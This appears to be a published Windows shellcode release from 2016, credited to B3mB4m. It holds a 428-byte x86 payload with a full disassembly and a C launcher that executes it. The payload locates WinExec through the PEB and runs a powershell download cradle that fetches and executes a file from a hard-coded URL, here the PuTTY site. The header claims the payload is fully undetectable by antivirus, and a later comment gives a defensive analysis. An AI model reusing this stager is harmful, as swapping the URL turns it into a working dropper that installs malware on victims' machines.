Windows XP - 10 - Download & Execute Shellcode



EKU-ID: 5633 CVE: OSVDB-ID:
Author: B3mB4m Published: 2016-06-21 Verified: Verified


/*
[+] Author  : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/shellsploit-framework
[~] Greetz  : Bomberman,T-Rex,Pixi
-----------------------------------------------------------
 
Tested on :
    Windows XP/SP3 x86
    Windows 7 Ultimate x64 
    Windows 8.1 Pro Build 9600 x64
    Windows 10 Home x64
 
 
* This source belongs to shellsploit project under MIT licence.
 
* If you convert it into an executable file, it will be FUD (without any encryption).
    -PoC : https://nodistribute.com/result/qwxU3DmFCR2M0OrQt
 
 
 
    0x0:    31c9            xor ecx, ecx
    0x2:    b957696e45      mov ecx, 0x456e6957
    0x7:    eb04            jmp 0xd
    0x9:    31c9            xor ecx, ecx
    0xb:    eb00            jmp 0xd
    0xd:    31c0            xor eax, eax
    0xf:    31db            xor ebx, ebx
    0x11:   31d2            xor edx, edx
    0x13:   31ff            xor edi, edi
    0x15:   31f6            xor esi, esi
    0x17:   648b7b30        mov edi, dword ptr fs:[ebx + 0x30]
    0x1b:   8b7f0c          mov edi, dword ptr [edi + 0xc]
    0x1e:   8b7f1c          mov edi, dword ptr [edi + 0x1c]
    0x21:   8b4708          mov eax, dword ptr [edi + 8]
    0x24:   8b7720          mov esi, dword ptr [edi + 0x20]
    0x27:   8b3f            mov edi, dword ptr [edi]
    0x29:   807e0c33        cmp byte ptr [esi + 0xc], 0x33
    0x2d:   75f2            jne 0x21
    0x2f:   89c7            mov edi, eax
    0x31:   03783c          add edi, dword ptr [eax + 0x3c]
    0x34:   8b5778          mov edx, dword ptr [edi + 0x78]
    0x37:   01c2            add edx, eax
    0x39:   8b7a20          mov edi, dword ptr [edx + 0x20]
    0x3c:   01c7            add edi, eax
    0x3e:   89dd            mov ebp, ebx
    0x40:   81f957696e45    cmp ecx, 0x456e6957
    0x46:   0f8530010000    jne 0x17c
    0x4c:   8b34af          mov esi, dword ptr [edi + ebp*4]
    0x4f:   01c6            add esi, eax
    0x51:   45              inc ebp
    0x52:   390e            cmp dword ptr [esi], ecx
    0x54:   75f6            jne 0x4c
    0x56:   8b7a24          mov edi, dword ptr [edx + 0x24]
    0x59:   01c7            add edi, eax
    0x5b:   668b2c6f        mov bp, word ptr [edi + ebp*2]
    0x5f:   8b7a1c          mov edi, dword ptr [edx + 0x1c]
    0x62:   01c7            add edi, eax
    0x64:   8b7caffc        mov edi, dword ptr [edi + ebp*4 - 4]
    0x68:   01c7            add edi, eax
    0x6a:   89d9            mov ecx, ebx
    0x6c:   b1ff            mov cl, 0xff
    0x6e:   53              push ebx
    0x6f:   e2fd            loop 0x6e
    0x71:   68293b7d22      push 0x227d3b29
    0x76:   6865786527      push 0x27657865
    0x7b:   687474792e      push 0x2e797474
    0x80:   6828277075      push 0x75702728
    0x85:   6863757465      push 0x65747563
    0x8a:   686c457865      push 0x6578456c
    0x8f:   685368656c      push 0x6c656853
    0x94:   686f6e292e      push 0x2e296e6f
    0x99:   6863617469      push 0x69746163
    0x9e:   6870706c69      push 0x696c7070
    0xa3:   686c6c2e41      push 0x412e6c6c
    0xa8:   6820536865      push 0x65685320
    0xad:   682d636f6d      push 0x6d6f632d
    0xb2:   6865637420      push 0x20746365
    0xb7:   682d4f626a      push 0x6a624f2d
    0xbc:   68284e6577      push 0x77654e28
    0xc1:   682729203b      push 0x3b202927
    0xc6:   682e657865      push 0x6578652e
    0xcb:   6875747479      push 0x79747475
    0xd0:   682c202770      push 0x7027202c
    0xd5:   6865786527      push 0x27657865
    0xda:   687474792e      push 0x2e797474
    0xdf:   68362f7075      push 0x75702f36
    0xe4:   68742f7838      push 0x38782f74
    0xe9:   6861746573      push 0x73657461
    0xee:   6874792f6c      push 0x6c2f7974
    0xf3:   682f707574      push 0x7475702f
    0xf8:   687468616d      push 0x6d616874
    0xfd:   6873677461      push 0x61746773
    0x102:  686c692f7e      push 0x7e2f696c
    0x107:  687274682e      push 0x2e687472
    0x10c:  68652e6561      push 0x61652e65
    0x111:  682f2f7468      push 0x68742f2f
    0x116:  687470733a      push 0x3a737074
    0x11b:  6828276874      push 0x74682728
    0x120:  6846696c65      push 0x656c6946
    0x125:  686c6f6164      push 0x64616f6c
    0x12a:  68446f776e      push 0x6e776f44
    0x12f:  686e74292e      push 0x2e29746e
    0x134:  68436c6965      push 0x65696c43
    0x139:  682e576562      push 0x6265572e
    0x13e:  68204e6574      push 0x74654e20
    0x143:  686a656374      push 0x7463656a
    0x148:  68772d4f62      push 0x624f2d77
    0x14d:  6820284e65      push 0x654e2820
    0x152:  682226207b      push 0x7b202622
    0x157:  68616e6420      push 0x20646e61
    0x15c:  68636f6d6d      push 0x6d6d6f63
    0x161:  686c6c202d      push 0x2d206c6c
    0x166:  6872736865      push 0x65687372
    0x16b:  68706f7765      push 0x65776f70
    0x170:  89e2            mov edx, esp
    0x172:  41              inc ecx
    0x173:  51              push ecx
    0x174:  52              push edx
    0x175:  ffd7            call edi
    0x177:  e88dfeffff      call 9
    0x17c:  8b34af          mov esi, dword ptr [edi + ebp*4]
    0x17f:  01c6            add esi, eax
    0x181:  45              inc ebp
    0x182:  813e45786974    cmp dword ptr [esi], 0x74697845
    0x188:  75f2            jne 0x17c
    0x18a:  817e0450726f63  cmp dword ptr [esi + 4], 0x636f7250
    0x191:  75e9            jne 0x17c
    0x193:  8b7a24          mov edi, dword ptr [edx + 0x24]
    0x196:  01c7            add edi, eax
    0x198:  668b2c6f        mov bp, word ptr [edi + ebp*2]
    0x19c:  8b7a1c          mov edi, dword ptr [edx + 0x1c]
    0x19f:  01c7            add edi, eax
    0x1a1:  8b7caffc        mov edi, dword ptr [edi + ebp*4 - 4]
    0x1a5:  01c7            add edi, eax
    0x1a7:  31c9            xor ecx, ecx
    0x1a9:  51              push ecx
    0x1aa:  ffd7            call edi
*/
 
#include<stdio.h>
  
/*
 * Raw 32-bit x86 payload: 0x1ac = 428 bytes of machine code, plus the NUL the
 * string literal appends. These are the bytes whose disassembly is listed in
 * the header comment above; every branch in it is relative, so the blob has
 * no fixed load address.
 *
 * What the listed disassembly shows it doing, in order:
 *  1. 0x17-0x2d: reads fs:[0x30] (the 32-bit PEB) and walks a linked module
 *     list until it finds a module whose name buffer has byte 0x33 ('3') at
 *     offset 0xc -- the usual import-free way of locating kernel32.dll.
 *  2. 0x2f-0x68: follows e_lfanew ([base+0x3c]) to the NT headers, takes the
 *     export directory from [hdr+0x78], and scans AddressOfNames for an
 *     entry whose first dword equals ecx: "WinE" (0x456e6957) on the first
 *     pass; on the second pass (0x17c-0x1a5) "Exit" + "Proc"
 *     (0x74697845 / 0x636f7250).
 *  3. 0x6a-0x175: pushes 255 zero dwords as a terminator, then the string
 *     built from the run of `push imm32`, sets edx = esp, and calls the
 *     resolved export with (string, 1) -- i.e. WinExec(cmd, SW_SHOWNORMAL).
 *     Decoding the pushes gives a `powershell -command` line that fetches a
 *     hard-coded URL with Net.WebClient.DownloadFile and ShellExecutes the
 *     saved file; in this sample the URL is the public PuTTY download site,
 *     so the published payload is a demonstration.
 *  4. 0x177 onward: `call 9` re-enters with ecx cleared, so the "WinE"
 *     compare fails, the lookup resolves ExitProcess, and it is called with 0.
 *
 * Review notes (defensive):
 *  - fs:[0x30] and the 32-bit register/PEB offsets mean this only runs inside
 *    a 32-bit process; the x64 entries under "Tested on" imply a WoW64 host.
 *  - The PEB/export-table walk, the WinExec call, and the powershell download
 *    cradle are the observable behaviours; the command text and URL are fixed
 *    in the bytes, so they are what detection content or IoCs should key on.
 *  - The array is mutable, non-const global data; executing it requires the
 *    data section to be mapped executable, which is what NX/DEP prevents.
 */
char shellcode[]=\
  
"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x29\x3b\x7d\x22\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x28\x27\x70\x75\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x68\x6f\x6e\x29\x2e\x68\x63\x61\x74\x69\x68\x70\x70\x6c\x69\x68\x6c\x6c\x2e\x41\x68\x20\x53\x68\x65\x68\x2d\x63\x6f\x6d\x68\x65\x63\x74\x20\x68\x2d\x4f\x62\x6a\x68\x28\x4e\x65\x77\x68\x27\x29\x20\x3b\x68\x2e\x65\x78\x65\x68\x75\x74\x74\x79\x68\x2c\x20\x27\x70\x68\x65\x78\x65\x27\x68\x74\x74\x79\x2e\x68\x36\x2f\x70\x75\x68\x74\x2f\x78\x38\x68\x61\x74\x65\x73\x68\x74\x79\x2f\x6c\x68\x2f\x70\x75\x74\x68\x74\x68\x61\x6d\x68\x73\x67\x74\x61\x68\x6c\x69\x2f\x7e\x68\x72\x74\x68\x2e\x68\x65\x2e\x65\x61\x68\x2f\x2f\x74\x68\x68\x74\x70\x73\x3a\x68\x28\x27\x68\x74\x68\x46\x69\x6c\x65\x68\x6c\x6f\x61\x64\x68\x44\x6f\x77\x6e\x68\x6e\x74\x29\x2e\x68\x43\x6c\x69\x65\x68\x2e\x57\x65\x62\x68\x20\x4e\x65\x74\x68\x6a\x65\x63\x74\x68\x77\x2d\x4f\x62\x68\x20\x28\x4e\x65\x68\x22\x26\x20\x7b\x68\x61\x6e\x64\x20\x68\x63\x6f\x6d\x6d\x68\x6c\x6c\x20\x2d\x68\x72\x73\x68\x65\x68\x70\x6f\x77\x65\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7";
  
main(){(* (int(*)()) shellcode)();}